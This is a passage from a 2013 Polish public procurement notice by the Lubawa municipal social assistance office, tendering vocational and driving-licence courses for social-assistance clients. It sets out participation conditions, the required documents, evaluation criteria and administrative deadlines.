<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest
1.Spełnienie warunków zawartych w niniejszym Specyfikacji Istotnych Warunków Zamówienia (SIWZ) oraz art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych zwanej dalej ustawą Pzp. 
O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy 
1)Posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli przepisy prawa nakładają obowiązek ich posiadania 
2)Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym                         i osobami zdolnymi do wykonania zamówienia i wykażą że

KURSY  ZAWODOWE   -  CZĘŚĆ 1, 2, 3, 4, 5

a)DOŚWIADCZENIE  I  WIEDZA

W okresie ostatnich trzech lat przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy przeprowadził usługi szkolenia odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia w ramach poszczególnych części zamówienia, tj.

1)CZĘŚĆ 1 - KURS  ZAWODOWY - Pomocnik kucharza
przeprowadzili co najmniej 2 Kursy zawodowe - Pomocnik kucharza Kursy zawodowe - kucharz dla klientów  pomocy społecznej  Miejskich Ośrodków Pomocy Społecznej (MOPS), Gminnych Ośrodków Pomocy Społecznej (GOPS), Powiatowych Centrów Pomocy Społecznej (PCPR) - potwierdzone pozytywnymi referencjami z MOPS, GOPS, PCPR (załączone do OFERTY)


2)CZĘŚĆ  2 - KURS  ZAWODOWY - Obsługa wózka widłowego (jezdniowego)
przeprowadzili co najmniej 2 Kursy zawodowe - Obsługa wózka widłowego (jezdniowego) dla klientów  pomocy społecznej  Miejskich Ośrodków Pomocy Społecznej (MOPS), Gminnych Ośrodków Pomocy Społecznej (GOPS), Powiatowych Centrów Pomocy Społecznej (PCPR) - potwierdzone pozytywnymi referencjami z MOPS, GOPS, PCPR (załączone do OFERTY)

3)CZĘŚĆ 3 - KURS ZAWODOWY - Opiekunka osób starszych i niepełnosprawnych 
przeprowadzili co najmniej 2 Kursy zawodowe - Opiekunka osób starszych lub Opiekunka osób starszych i niepełnosprawnych dla klientów  pomocy społecznej Miejskich Ośrodków Pomocy Społecznej (MOPS), Gminnych Ośrodków Pomocy Społecznej (GOPS), Powiatowych Centrów Pomocy Społecznej (PCPR) - potwierdzone pozytywnymi referencjami z MOPS, GOPS, PCPR (załączone do OFERTY)


4)CZĘŚĆ 4 - KURS ZAWODOWY - Konserwator
przeprowadzili co najmniej 2 Kursy zawodowe - Konserwator lub Hydraulik lub Stolarz lub Ślusarz dla klientów  pomocy społecznej Miejskich Ośrodków Pomocy Społecznej (MOPS), Gminnych Ośrodków Pomocy Społecznej (GOPS), Powiatowych Centrów Pomocy Społecznej (PCPR) - potwierdzone pozytywnymi referencjami z MOPS, GOPS, PCPR (załączone do OFERTY)


5)CZĘŚĆ 5 - KURS  ZAWODOWY - Fryzjerka
przeprowadzili co najmniej 2 Kursy zawodowe - Fryzjerka dla klientów  pomocy społecznej Miejskich Ośrodków Pomocy Społecznej (MOPS), Gminnych Ośrodków Pomocy Społecznej (GOPS), Powiatowych Centrów Pomocy Społecznej (PCPR) - potwierdzone pozytywnymi referencjami z MOPS, GOPS, PCPR (załączone do OFERTY)


b)POTENCJAŁ TECHNICZNY I OSOBOWY


1)Dysponują osobami które posiadają wykształcenie niezbędne do realizacji poszczególnych szkoleń

a)wykładowcy trenerzy zajęć teoretycznych biorący udział w realizacji zamówienia muszą posiadać wykształcenie wyższe o kierunku zgodnym z tematyką prowadzonych szkoleń lub wykształcenie wyższe i specjalizację kierunkową  uprawniające do prowadzenia w/w szkoleń będących przedmiotem zamówienia (część 1,2,3,4,5)

b)trenerzy zajęć praktycznych biorący udział w realizacji zamówienia muszą posiadać  co najmniej wykształcenie średnie zgodne z tematyką prowadzonych szkoleń lub średnie i szkolenie kierunkowe uprawniające do prowadzenia szkoleń będących przedmiotem zamówienia (części 1,2,3,4,5)
2)Dysponują  pomieszczeniami oraz sprzętem niezbędnym do należytej realizacji zajęć teoretycznych
3)Zapewnią należytą realizację zajęć praktycznych, tj. zajęcia u  pracodawców prowadzących działalność zgodną z tematyką poszczególnych szkoleń, dających praktyczne wykorzystanie nabytej wiedzy w danym zawodzie

KURS  PRAWA  JAZDY  KAT. B -  CZĘŚĆ 6

a)DOŚWIADCZENIE  I  WIEDZA 

W okresie ostatnich trzech lat przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy przeprowadził usługi szkolenia odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia w ramach części 6 zamówienia, tj.
co najmniej 1 Kurs prawa jazdy kat. B lub C lub CE lub D dla klientów  pomocy społecznej Miejskich Ośrodków Pomocy Społecznej (MOPS), Gminnych Ośrodków Pomocy Społecznej (GOPS), Powiatowych Centrów Pomocy Społecznej (PCPR) - potwierdzone pozytywnymi referencjami z MOPS, GOPS, PCPR (załączone do OFERTY)

b)POTENCJAŁ TECHNICZNY I OSOBOWY

1)Wykładowcy trenerzy zajęć teoretycznych i zajęć praktycznych biorący udział                     w realizacji zamówienia muszą posiadać odpowiednie kwalifikacje, uprawnienia                  (wymagane obowiązującymi przepisami prawa) i doświadczenie umożliwiające należyte wykonanie usługi (zajęć teoretycznych i praktycznych)
2)Wykonawca musi dysponować  pomieszczeniami, urządzeniami, pomocami                        i materiałami dydaktycznymi niezbędnymi do należytej realizacji zajęć teoretycznych

3)Wykonawca musi dysponować sprawnym samochodem osobowym niezbędnym do realizacji zajęć praktycznych szkolenia na Prawo jazdy kat. B.


KURS  PRAWA  JAZDY  KAT. C -  CZĘŚĆ 7

a)DOŚWIADCZENIE  I  WIEDZA 

W okresie ostatnich trzech lat przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy przeprowadził usługi szkolenia odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia w ramach części zamówienia, tj
co najmniej 1 Kurs prawa jazdy kat. B lub C lub CE lub D dla klientów  pomocy społecznej Miejskich Ośrodków Pomocy Społecznej (MOPS), Gminnych Ośrodków Pomocy Społecznej (GOPS), Powiatowych Centrów Pomocy Społecznej (PCPR) - potwierdzone pozytywnymi referencjami z MOPS, GOPS, PCPR (załączone do OFERTY)

b)POTENCJAŁ TECHNICZNY I OSOBOWY


1)Wykładowcy trenerzy zajęć teoretycznych i zajęć praktycznych biorący udział                     w realizacji zamówienia muszą posiadać odpowiednie kwalifikacje, uprawnienia                  (wymagane obowiązującymi przepisami prawa) i doświadczenie umożliwiające należyte wykonanie usługi (zajęć teoretycznych i praktycznych)

2)Wykonawca musi dysponować  pomieszczeniami, urządzeniami, pomocami                         i materiałami dydaktycznymi niezbędnymi do należytej realizacji zajęć teoretycznych
3)Wykonawca musi dysponować sprawnym samochodem ciężarowym niezbędnym do realizacji zajęć praktycznych szkolenia na Prawo jazdy kat. C.


2.Znajdują się w sytuacji finansowej zapewniającej wykonanie zamówienia. 

3.Nie podlegają wykluczeniu z postępowania na podstawie art. 24 Pzp. 

Ocena spełniania w/w warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach                      i oświadczeniach wyszczególnionych w pkt. 10 niniejszej Specyfikacji Istotnych Warunków Zamówienia (SIWZ). Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww warunki Wykonawca spełnił. 
Uzupełnienie wymaganych dokumentów jest możliwe po upływie terminu składania ofert,  tylko i wyłącznie na podstawie art. 26 ust. 3 ustawy Pzp. 
Nie spełnienie chociażby jednego z ww warunków skutkować będzie wykluczeniem Wykonawcy                       z postępowania.
W celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawca zobowiązany jest złożyć wraz z odpowiednio wypełnionym i podpisanym FORMULARZEM OFERTOWYM, stanowiącym Załącznik nr 1 do SIWZ 

1)Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy Pzp. - wzór oświadczenia - Załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia (SIWZ). oraz nie podleganiu wykluczeniu na podstawie art. 24 ust. 1 ustawy Pzp. - wzór oświadczenia - Załącznik nr 3 do Specyfikacji Istotnych Warunków Zamówienia (SIWZ).  

2)Następujące oświadczenia i dokumenty

2.1.W celu potwierdzenia spełnienia warunku, o którym mowa w Pkt. 9 ust. 1 pkt. 1
Aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż  6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust.1 pkt.2 ustawy.

2.2.W celu potwierdzenia spełnienia warunku o którym mowa w Pkt. 9 ust. 1 pkt. 2                             ppkt. 2.1 a WYKAZ USŁUG WYKONANYCH, a w przypadku świadczeń okresowych                      lub ciągłych również wykonywanych, w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,                          z podaniem dat wykonania odbiorców (klientów Miejskich i Gminnych Ośrodków Pomocy Społecznej, Powiatowego Centrum Pomocy Rodzinie) nazwę programu, projektu oraz załączeniem dokumentów potwierdzających, że te usługi zostały wykonane należycie (pozytywne referencje od Zamawiających). 


Wymagane jest w ramach Części 1, 2, 3, 4, 5 przeprowadzenie co najmniej                                    2 usług kursów zawodowych -  tj

CZĘŚĆ 1 - KURS  ZAWODOWY -  Pomocnik kucharza
co najmniej 2 Kursy zawodowe - Pomocnik kucharza Kursy zawodowe - kucharz dla klientów  pomocy społecznej  Miejskich Ośrodków Pomocy Społecznej (MOPS), Gminnych Ośrodków Pomocy Społecznej (GOPS), Powiatowych Centrów Pomocy Społecznej (PCPR) - potwierdzone pozytywnymi referencjami z MOPS, GOPS, PCPR (załączone do OFERTY)


CZĘŚĆ 2 - KURS ZAWODOWY - Obsługa wózka widłowego (jezdniowego)
przeprowadzili co najmniej 2 Kursy zawodowe - Obsługa wózka widłowego (jezdniowego) dla klientów  pomocy społecznej  Miejskich Ośrodków Pomocy Społecznej (MOPS), Gminnych Ośrodków Pomocy Społecznej (GOPS), Powiatowych Centrów Pomocy Społecznej (PCPR) - potwierdzone pozytywnymi referencjami z MOPS, GOPS, PCPR (załączone do OFERTY)


CZĘŚĆ 3 - KURS ZAWODOWY - Opiekunka osób starszych i niepełnosprawnych
co najmniej 2 Kursy zawodowe - Opiekunka osób starszych lub Opiekun/ka osób starszych i niepełnosprawnych dla klientów  pomocy społecznej Miejskich Ośrodków Pomocy Społecznej (MOPS), Gminnych Ośrodków Pomocy Społecznej (GOPS), Powiatowych Centrów Pomocy Społecznej (PCPR) - potwierdzone pozytywnymi referencjami z MOPS, GOPS, PCPR (załączone do OFERTY)


CZĘŚĆ 4 - KURS ZAWODOWY - Konserwator
co najmniej 2 Kursy zawodowe - Konserwator lub Hydraulik lub Stolarz lub Ślusarz  dla klientów  pomocy społecznej Miejskich Ośrodków Pomocy Społecznej (MOPS), Gminnych Ośrodków Pomocy Społecznej (GOPS), Powiatowych Centrów Pomocy Społecznej (PCPR) - potwierdzone pozytywnymi referencjami z MOPS, GOPS, PCPR (załączone do OFERTY)


CZĘŚĆ 5 - KURS  ZAWODOWY - Fryzjerka
co najmniej 2 Kursy zawodowe - Fryzjerka dla klientów  pomocy społecznej Miejskich Ośrodków Pomocy Społecznej (MOPS), Gminnych Ośrodków Pomocy Społecznej (GOPS), Powiatowych Centrów Pomocy Społecznej (PCPR) - potwierdzone pozytywnymi referencjami z MOPS, GOPS, PCPR (załączone do OFERTY)

W celu potwierdzenia spełnienia warunku o którym mowa w pkt. 9 ust. 2 pkt. 2                             ppkt. 2.2 a i ppkt. 2.3 a  WYKAZ USŁUG WYKONANYCH, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,                         z podaniem dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających,                 że te usługi zostały wykonane należycie (pozytywne referencje od Zamawiających). 

Wymagane jest w ramach Części 6, 7 przeprowadzenie co najmniej 1 Kursu prawa jazdy kat. B lub C lub CE  lub  D dla klientów  pomocy społecznej Miejskich Ośrodków Pomocy Społecznej (MOPS), Gminnych Ośrodków Pomocy Społecznej (GOPS), Powiatowych Centrów Pomocy Społecznej (PCPR) - potwierdzone pozytywnymi referencjami z MOPS, GOPS, PCPR (załączone do OFERTY).

WYKAZ USŁUG WYKONANYch w ramach części 1, 2, 3, 4, 5, 6, 7 przedmiotu zamówienia należy przedstawić na druku stanowiącym Załącznik nr 4  do Specyfikacji Istotnych Warunków Zamówienia (SIWZ).

W celu potwierdzenia spełnienia warunku o którym mowa w pkt. 9 ust.2 pkt. 2 ppkt. 2.1 b                                    WYKAZ OSÓB - potwierdzający, że Wykonawca dysponuje lub będzie dysponował osobami posiadającymi odpowiednie wykształcenie, doświadczenie niezbędne do realizacji szkoleń zawodowych w ramach przedmiotu  zamówienia, tj
A)Wykładowcy/trenerzy zajęć teoretycznych biorący udział w realizacji zamówienia muszą posiadać wykształcenie wyższe o kierunku zgodnym z tematyką prowadzonych szkoleń lub wykształcenie wyższe i specjalizację kierunkową uprawniające do prowadzenia  szkoleń będących przedmiotem zamówienia CZĘŚCI 1, 2, 3, 4, 5

B)Trenerzy zajęć praktycznych biorący udział w realizacji zamówienia muszą posiadać                 co najmniej wykształcenie średnie zgodne z tematyką prowadzonych szkoleń lub średnie i szkolenie kierunkowe uprawniające do prowadzenia szkoleń będących przedmiotem zamówienia CZĘŚCI 1,2,3,4, 5.


2.5.W celu potwierdzenia spełnienia warunku o którym mowa w pkt. 9 ust.2 pkt. 2                       ppkt. 2.2 b i 2.3 b WYKAZ OSÓB - potwierdzający, że Wykonawca dysponuje lub będzie dysponował osobami do realizacji szkoleń Kursu prawa jazdy kat. B Kursu prawa                 jazdy kat. C  w ramach przedmiotu  zamówienia - CZĘŚĆ 6 i 7, tj



Wykładowcy trenerzy zajęć teoretycznych i zajęć praktycznych biorący udział                     w realizacji zamówienia muszą posiadać odpowiednie kwalifikacje, uprawnienia                  wymagane obowiązującymi przepisami prawa oraz doświadczenie umożliwiające należyte wykonanie usługi (zajęć teoretycznych i praktycznych).

WYKAZ OSÓB należy przedstawić na druku stanowiącym Załącznik nr 5 do Specyfikacji Istotnych Warunków Zamówienia (SIWZ) wraz z kserokopią dyplomów oraz innych dokumentów, poświadczających posiadanie przez osoby prowadzące szkolenia odpowiednie wykształcenie, kwalifikacje, uprawnienia.


W celu potwierdzenia spełnienia warunku o którym mowa w pkt. 9 ust.2 pkt. 2 ppkt. 2.1 b,              2.2 b, 2.3 b w zakresie potencjału technicznego, tj. miejsca realizacji zajęć teoretyczny               i praktycznych, urządzeń, sprzętu, materiałów dydaktycznych - Wykonawca przedstawia     w WYKAZIE POMIESZCZEŃ, URZĄDZEŃ I MATERIAŁÓW DYDAKTYCZNYCH - na druku stanowiącym Załączniku nr 6  do SIWZ  (dotyczy CZĘŚCI 1, 2 ,3, 4, 5, 6, 7).
                                    
W celu potwierdzenia spełnienia warunku o którym mowa w pkt. 9 ust.2 pkt. 2 ppkt. 2.2 b                  i 2.3 b) w zakresie potencjału technicznego, tj dysponowania samochodem samochodami osobowym osobowymi do zajęć praktycznych na Prawo jazdy kat. B; samochodem samochodami ciężarowymi do zajęć praktycznych na Prawo jazdy kat. C -    Wykonawca przedstawia w WYKAZIE SPRZĘTU - SAMOCHODÓW na druku stanowiącym Załącznik nr 7  do SIWZ (dotyczy CZĘSCI  6, 7).


Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające,                          że Wykonawca nie zalega z opłacaniem podatków, lub, że uzyskał przewidziane prawem odroczenie lub rozłożenie na raty zaległych płatności lub o wstrzymaniu  w całości wykonania decyzji organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu                        składania ofert.

Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega                                z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub  potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub                 o wstrzymaniu w całości wykonania decyzji organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

W przypadku zlecania części zamówienia podwykonawcom - oświadczenie w sprawie realizacji zamówienia przy współudziale podwykonawców stanowiące Załącznik nr 8               do SIWZ. 


Wymagane dokumenty mogą być złożone w formie oryginału lub kopii poświadczonej                         za zgodność z oryginałem przez Wykonawcę.


Do oferty należy dołączyć również Ramowy Program usługi - szkolenia - zgodnie z formularzem stanowiącym Załącznik nr 9  do Specyfikacji Istotnych Warunków Zamówienia (SIWZ) - dotyczy wszystkich szkoleń (Część 1,2,3,4,5,6,7).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wyboru najkorzystniejszej oferty Zamawiający przyjął następujące kryterium:

A)DOŚWIADCZENIE I WIEDZA -  60%

A.1) Liczba zrealizowanych usług na rzecz klientów pomocy społecznej: Miejskich Ośrodków Pomocy Społecznej (MOPS), Gminnych Ośrodków Pomocy Społecznej (GOPS), Powiatowych Centrów Pomocy Rodzinie (PCPR) w zakresie poszczególnych KURSÓW ZAWODOWYCH będących częściami przedmiotu zamówienia, tj.

1)CZĘŚĆ  1 - Kurs zawodowy - Pomocnik kucharza

2)CZĘŚĆ 2 - Kurs zawodowy - Obsługa wózka widłowego (jezdniowego)
3)CZĘŚĆ 3 -  Kurs zawodowy - Opiekunka osób starszych i niepełnosprawnych

CZĘŚĆ 4 -   Kurs zawodowy - Konserwator 
CZĘŚĆ  5 -  Kurs zawodowy - Fryzjerka
CZĘŚĆ 6 -  Kurs prawa jazdy kat. B
CZĘŚĆ 7 -  Kurs prawa jazdy kat. C 

Realizacja kursów zawodowych dla klientów pomocy społecznej powinna być potwierdzona pozytywnymi referencjami z MOPS, GOPS, PCPR, które należy dołączyć do OFERTY                    i wykazać w  Załączniku nr 4 do SIWZ (Wykaz usług wykonanych).  

Zamawiający przyjął następujący sposób oceny w kryterium doświadczenie

1)Część 1, 2, 3, 4, 5
przeprowadzenie 2 usług szkoleń  zgodnie z opisem danej części zamówienia                        w PKT.9 SIWZ (wymagana minimalna ilość zrealizowanych usług szkoleń)    - 20 pkt
przeprowadzenie 3 usług szkoleń             - 30 pkt
przeprowadzenie 4 usług szkoleń             - 40 pkt
przeprowadzenie 5 usług szkoleń             - 50 pkt
przeprowadzenie 6 usług szkoleń i więcej - 60 pkt.


Część 6, 7
przeprowadzenie 1 usługi szkolenia  zgodnie z opisem w danej części zamówienia w PKT. 9 SIWZ (wymagana minimalna ilość zrealizowanych usług szkoleń)   - 20 pkt
przeprowadzenie 2 usług szkoleń             - 30 pkt
przeprowadzenie 3 usług szkoleń             - 40 pkt
przeprowadzenie 4 usług/szkoleń             - 50 pkt
przeprowadzenie 5 usług/szkoleń i więcej - 60 pkt.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2)	Wykonawca musi dysponować  pomieszczeniami, urządzeniami, pomocami                         i materiałami dydaktycznymi niezbędnymi do należytej realizacji zajęć teoretycznych

Dotyczy Częśći 6 i 7 - Wykonawca musi dysponować sprawnym samochodem samochodami osobowym osobowymi do zajęć praktycznych na Prawo jazdy kat. B oraz sprawnym samochodem samochodami ciężarowymi do zajęć praktycznych na Prawo jazdy kat. C</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku o którym mowa w pkt. 9 ust.2 pkt. 2 ppkt. 2.1 b)                                   WYKAZ OSÓB - potwierdzający, że Wykonawca dysponuje lub będzie dysponował osobami posiadającymi odpowiednie wykształcenie, doświadczenie niezbędne do realizacji szkoleń zawodowych w ramach przedmiotu  zamówienia, tj
AWykładowcy trenerzy zajęć teoretycznych biorący udział w realizacji zamówienia muszą posiadać wykształcenie wyższe o kierunku zgodnym z tematyką prowadzonych szkoleń lub wykształcenie wyższe i specjalizację kierunkową uprawniające do prowadzenia  szkoleń będących przedmiotem zamówienia CZĘŚCI 1, 2, 3, 4, 5

Trenerzy zajęć praktycznych biorący udział w realizacji zamówienia muszą posiadać                 co najmniej wykształcenie średnie zgodne z tematyką prowadzonych szkoleń lub średnie i szkolenie kierunkowe uprawniające do prowadzenia szkoleń będących przedmiotem zamówienia CZĘŚCI 1,2,3,4, 5.


W celu potwierdzenia spełnienia warunku o którym mowa w pkt. 9 ust.2 pkt. 2                       ppkt. 2.2 b i 2.3 b) WYKAZ OSÓB - potwierdzający, że Wykonawca dysponuje lub będzie dysponował osobami do realizacji szkoleń Kursu prawa jazdy kat. B Kursu prawa                 jazdy kat. C  w ramach przedmiotu  zamówienia - CZĘŚĆ 6 i 7, tj



Wykładowcy trenerzy zajęć teoretycznych i zajęć praktycznych biorący udział                     w realizacji zamówienia muszą posiadać odpowiednie kwalifikacje, uprawnienia                  wymagane obowiązującymi przepisami prawa oraz doświadczenie umożliwiające należyte wykonanie usługi (zajęć teoretycznych i praktycznych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - Doświadczenie i wiedza - 60</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	Zamawiający zastrzega sobie prawo unieważnienia postępowania o udzielenie zamówienia,                              w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej, które miały być przeznaczone na sfinansowanie  zamówienia.

2)	Zamawiający zastrzega sobie prawo unieważnienia postępowania o udzielenie zamówienia,                       w przypadku wystąpienia istotnych  zmian  okoliczności powodujących, że prowadzenie postępowania lub wykonanie zamówienia nie leży w interesie publicznym, czego nie można było wcześniej przewidzieć.

3)	Zamawiający zastrzega sobie prawo zmiany okresu realizacji poszczególnych części przedmiotu zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej na okres stanowiący przedmiot zamówienia lub nie wyrażenia zgody przez IP (Instytucję Pośredniczącą).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gopslubawa.4bip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej Gminy Lubawa Fijewo 73, 14-260 Lubawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.09.2013 godzina 10:00, miejsce: Ośrodek Pomocy Społecznej Gminy Lubawa, Fijewo 73, 14-260 Lubawa pok. nr 17.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projektu systemowego  pn. Aktywna rodzina  Ośrodka Pomocy Społecznej Gminy Lubawa realizowanego    w 2013r. współfinansowanego ze środków Unii  Europejskiej w ramach  Europejskiego Funduszu Społecznego  w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji  społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> KURS  ZAWODOWY - Pomocnik kucharza.</p>
